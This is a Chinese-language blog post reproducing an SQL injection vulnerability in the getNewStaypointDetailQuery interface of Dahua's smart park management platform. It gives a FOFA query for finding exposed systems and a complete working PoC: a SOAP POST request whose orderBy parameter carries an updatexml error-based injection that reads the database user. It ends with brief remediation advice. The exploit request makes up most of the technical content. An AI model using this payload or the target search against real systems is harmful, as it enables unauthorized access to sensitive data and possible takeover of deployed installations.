Advertisement

大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入漏洞复现

阅读量:

大华智慧园区综合管理平台是一款具备园区运营、资源调配及智能服务功能的管理平台,旨在优化资源分配并提升用户体验。然而,在getNewStaypointDetailQuery接口处存在SQL注入漏洞,由于未对用户的输入进行过滤拼接至SQL语句中,导致远程未授权攻击者可获取敏感信息并进一步获取目标系统权限。通过提供PoC(Proof of Concept)演示了该漏洞的复现过程,并建议采取限制访问来源地址及升级至安全版本等修复措施以防止潜在风险的发生。

0x01 产品简介

大华智慧式园区综合管理系统作为一个整合型的服务系统,在规划与运营方面具有显著优势

0x02 漏洞概述

在大华智慧园区综合管理平台的getNewStaypointDetailQuery接口处未实施有效的输入过滤措施,在未经验证的情况下直接将用户的输入嵌入到SQL查询语句中。这种做法使得系统存在SQL注入漏洞风险。潜在的远程未授权攻击者可能利用此漏洞获取敏感信息,并进而可能导致目标系统权限被进一步获取。

0x03 复现环境

FOFA:app="dahua-智慧园区综合管理平台"

0x04 漏洞复现

PoC

复制代码
 POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1

    
 Host: your-ip
    
 User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    
 Content-Type: text/xml;charset=UTF-8
    
  
    
 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">
    
 <soapenv:Header/>
    
 <soapenv:Body>
    
 <car:getNewStaypointDetailQuery>
    
 <!--type: string-->
    
 <searchJson>{}</searchJson>
    
 <!--type: string-->
    
 <pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,(select user()),0x7e),1)--"}</pageJson>
    
 <!--type: string-->
    
 <extend>quae divum incedo</extend>
    
 </car:getNewStaypointDetailQuery>
    
 </soapenv:Body>
    
 </soapenv:Envelope>
    
    
    
    
    AI助手

查询当前用户

0x05 修复建议

限制访问来源地址,如非必要,不要将系统开放在互联网上。

升级至安全版本

全部评论 (0)

还没有任何评论哟~